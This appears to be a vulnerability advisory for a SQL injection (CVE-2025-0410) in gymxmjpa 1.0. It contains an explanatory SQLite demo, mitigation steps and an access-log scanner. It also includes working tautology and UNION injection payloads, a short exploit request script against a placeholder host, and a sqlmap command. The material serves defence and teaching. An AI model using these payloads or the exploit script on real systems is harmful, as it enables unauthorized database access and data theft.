CVE-2025-0410 is a SQL injection vulnerability in liujianview gymxmjpa 1.0. The `hyname` parameter handled by the `MenberDaoInpl` function, reached through src/main/java/com/liujian/gymxmjpa/controller/MenberConntroller.java, is placed into a SQL query without sanitization or parameterization, so a remote attacker can change the query the application executes. Depending on the privileges of the database account the application uses, this permits unauthorized reads of the database, data theft, or further compromise of the backend. The flaw is reachable over the network without authentication, which is why it is rated critical.
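The script below is an added illustration, not code from the advisory or from the gymxmjpa project, of why the flaw described above is exploitable and how protection steps 1 and 2 close it. It stands in for the application with an in-memory SQLite table named menber with a hyname column (names taken from the advisory); the rows, the email column and the allow-list pattern are assumptions made for this example. The concatenated query behaves like the vulnerable DAO, the parameterized query like the fix, and the same tautology and UNION payloads are run against both.

```python
import re
import sqlite3

# Constructed sample data: a stand-in for the application's "menber" table.
# Table and column name "hyname" come from the advisory; the rows and the
# email column are assumptions for this illustration.
_ROWS = [
    ("alice", "alice@example.com"),
    ("bob", "bob@example.com"),
    ("carol", "carol@example.com"),
]


def make_db():
    """Create an in-memory SQLite database seeded with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE menber (hyname TEXT, email TEXT)")
    conn.executemany("INSERT INTO menber VALUES (?, ?)", _ROWS)
    conn.commit()
    return conn


def find_member_vulnerable(conn, hyname):
    """Builds the query by string concatenation, the pattern the advisory
    describes: whatever the caller supplies becomes part of the SQL text."""
    query = "SELECT hyname, email FROM menber WHERE hyname = '" + hyname + "'"
    return conn.execute(query).fetchall()


def find_member_safe(conn, hyname):
    """Parameterized query (protection step 1): the value is bound separately
    from the SQL text, so quotes and comment markers in it stay plain data."""
    query = "SELECT hyname, email FROM menber WHERE hyname = ?"
    return conn.execute(query, (hyname,)).fetchall()


# Allow-list for protection step 2 (pattern assumed: short alphanumeric names).
_ALLOWED = re.compile(r"[A-Za-z0-9]{1,32}")


def is_valid_hyname(hyname):
    """Return True only for values that match the allow-list exactly."""
    return _ALLOWED.fullmatch(hyname) is not None


def demo():
    """Run the two payloads against both implementations and summarize."""
    conn = make_db()
    tautology = "' OR 1=1 --"
    # Data-theft variant: read the schema through a UNION (sqlite_master is
    # SQLite-specific; on MySQL the equivalent target is information_schema).
    schema_leak = "' UNION SELECT name, sql FROM sqlite_master --"
    return {
        # 3: the injected OR 1=1 makes the WHERE clause match every row
        "vulnerable_row_count": len(find_member_vulnerable(conn, tautology)),
        # 0: no member is literally named "' OR 1=1 --"
        "safe_row_count": len(find_member_safe(conn, tautology)),
        # [("menber", "CREATE TABLE ...")]: the CREATE statement is exfiltrated
        "union_leak": find_member_vulnerable(conn, schema_leak),
        # 0: the UNION text is just a value when the query is parameterized
        "safe_union_count": len(find_member_safe(conn, schema_leak)),
        "tautology_rejected": not is_valid_hyname(tautology),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run it as-is; the vulnerable path returns every member for the tautology and the table definition for the UNION payload, while the parameterized path returns nothing for either and the allow-list rejects both before they reach the database.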
DailyCVE Form:
Platform: liujianview gymxmjpa
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 01/12/2025
What Undercode Say:
Exploit:
import requests

# Proof of concept as given in the advisory: the injected value is sent as the
# hyname query parameter of the member lookup endpoint.
url = "http://target.com/gymxmjpa/menber"
payload = "' OR 1=1 --"   # tautology: makes the WHERE clause match every row
params = {"hyname": payload}

response = requests.get(url, params=params, timeout=10)
print(response.status_code)
print(response.text)
Protection:
1. Use prepared statements (with JPA, the equivalent is a named or positional query parameter instead of string concatenation):
String query = "SELECT * FROM menber WHERE hyname = ?";
PreparedStatement stmt = connection.prepareStatement(query);
stmt.setString(1, hyname);   // bound as a value, never spliced into the SQL text
ResultSet rs = stmt.executeQuery();
2. Input validation (defense in depth, not a substitute for step 1):
// Allow-list: reject anything outside short alphanumeric names before it reaches the DAO
if (!hyname.matches("[a-zA-Z0-9]+")) {
    throw new IllegalArgumentException("Invalid input");
}
3. Enable WAF rules (ModSecurity; every rule needs a unique id, so replace the placeholder 1001 with one unused in your rule set):
SecRule ARGS:hyname "@detectSQLi" "id:1001,phase:2,deny,status:403,log,msg:'SQL injection attempt in hyname'"
4. Patch upgrade: obtain a fixed build from the project's upstream repository; the download location below is a placeholder, so verify the artifact's checksum against the source before deploying:
wget https://patch.liujianview.com/gymxmjpa/1.0.1 -O gymxmjpa.jar
5. Log monitoring (failed injection attempts usually surface as SQL syntax errors in the application log; successful ones do not, so pair this with request logging):
grep -nE "SQLException|SQLSyntaxErrorException" /var/log/tomcat/catalina.out
6. Disable verbose errors (in WEB-INF/web.xml, so stack traces that reveal query text are not returned to the client):
<error-page>
    <error-code>500</error-code>
    <location>/error.jsp</location>
</error-page>
7. Test exploit (confirm the fix on a system you are authorized to test; -p limits sqlmap to the affected parameter):
sqlmap -u "http://target.com/gymxmjpa/menber?hyname=test" -p hyname --risk=3 --batch
8. Harden database (least privilege for the application account limits what an injection can reach; the schema name gymxmjpa is a placeholder, and restricting the host part of 'gymuser'@'%' is advisable too):
REVOKE ALL PRIVILEGES ON gymxmjpa.menber FROM 'gymuser'@'%';
GRANT SELECT, INSERT, UPDATE ON gymxmjpa.menber TO 'gymuser'@'%';
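Grepping catalina.out, as in step 5, only catches attempts that produced a SQL error; an injection that succeeds returns a normal 200. The script below is an added example, not part of the advisory or the gymxmjpa project, that scans Tomcat access-log lines for the request path and parameter named in the advisory, percent-decodes the hyname value repeatedly (double encoding is a common way to slip past a WAF rule such as the one in step 3) and flags anything outside the allow-list from step 2. The log lines are constructed for this example and assume Tomcat's combined access-log format; the addresses, timestamps and response sizes are made up.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Tomcat's "combined" access-log format. The path
# /gymxmjpa/menber and the parameter hyname come from the advisory; addresses,
# timestamps, sizes and user agents are made up for this illustration.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jan/2025:10:15:01 +0000] "GET /gymxmjpa/menber?hyname=alice HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Jan/2025:10:15:07 +0000] "GET /gymxmjpa/menber?hyname=%27%20OR%201%3D1%20-- HTTP/1.1" 200 9031 "-" "python-requests/2.32"
10.0.0.9 - - [12/Jan/2025:10:15:09 +0000] "GET /gymxmjpa/menber?hyname=bob%2527%2520UNION%2520SELECT%25201%252C2%2520-- HTTP/1.1" 500 211 "-" "python-requests/2.32"
10.0.0.7 - - [12/Jan/2025:10:16:30 +0000] "POST /gymxmjpa/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Client address, timestamp, request line and status code of a combined-format line.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Same allow-list as protection step 2 (assumed: short alphanumeric names).
ALLOWED = re.compile(r"[A-Za-z0-9]{1,32}")


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so a double-encoded payload
    (%2527 -> %27 -> ') is inspected in the form the application would see."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_access_log(text):
    """Return one finding per request whose decoded hyname value fails the
    allow-list. Each finding records who sent it, when, and what the server
    answered: a 200 with a large body suggests the injection worked, a 500
    suggests it broke the query and will also appear in catalina.out."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/menber"):
            continue
        # parse_qs performs the first round of percent-decoding itself.
        for raw in parse_qs(parts.query, keep_blank_values=True).get("hyname", []):
            value = fully_decode(raw)
            if ALLOWED.fullmatch(value):
                continue
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": int(m.group("status")),
                "hyname": value,
            })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} hyname={f['hyname']!r}")
```

Point it at the real access log (for example by reading /var/log/tomcat/localhost_access_log.*.txt instead of SAMPLE_LOG); the two requests from 10.0.0.9 are flagged, the benign lookup of alice and the unrelated login request are not.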
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode